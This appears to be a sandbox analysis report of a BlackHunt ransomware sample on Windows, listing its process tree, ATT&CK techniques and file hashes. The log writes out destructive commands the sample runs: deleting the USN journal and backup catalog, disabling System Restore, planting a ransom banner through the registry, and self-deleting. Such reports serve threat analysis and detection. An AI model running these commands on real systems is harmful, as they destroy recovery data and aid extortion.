C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:264
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2788
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:920
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:5024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:1156
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:5044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5056
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG DELETE "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "HealthService" /f2⤵PID:628
-
C:\Windows\system32\reg.exeREG DELETE "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "HealthService" /f3⤵PID:820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:4700
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:5040
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:2284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:1240
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:1996
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:2400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:4972 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:4976
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start /min cmd /c del /F C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe2⤵PID:908
-
C:\Windows\SysWOW64\cmd.execmd /c del /F C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe3⤵PID:1908
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3992
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1544
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:440
Network
MITRE ATT&CK Enterprise v6
- Persistence
  - Modify Existing Service (1)
  - Registry Run Keys / Startup Folder (1)
  - Scheduled Task (1)
- Defense Evasion
  - Bypass User Account Control (1)
  - Disabling Security Tools (2)
  - File Deletion (3)
  - Indicator Removal on Host (1)
  - Modify Registry (5)
Downloads
- Filesize: 10KB
  MD5: c4e9dc244ac49843a08da3e6609c775f
  SHA1: 189866d7e0e5422abddf454ee31b53bef64c558f
  SHA256: 16c664e9f9d0d8cbb60ed020016054492b4549183dc2028382c3faf47cf627e8
  SHA512: 6c396c98254eda5b20e6e32034f9875f5cfe87a7ab8d76a65a20a2a18594a38d647fced8fec8e9457f1ee44ece7062af4bb461481d6b4f6718b2783aecda4fe2
- Filesize: 687B
  MD5: 3409cb1796ae3e9bd975c8303469b955
  SHA1: 3a126e1f3b7c4dc37676e1a2a8131ddd880591f4
  SHA256: 5d081e33612f4ddb324934bd369d77d2fd7a749a2a568f406917d55c3e6459b5
  SHA512: 69fafc727e0208e2494fe872eab0107746c1c9ecbec4e2709bca11b5f65547ac043095781c0105c6a6f8de0073d326c43d9ee1bf6480ef93033c76e77826cafc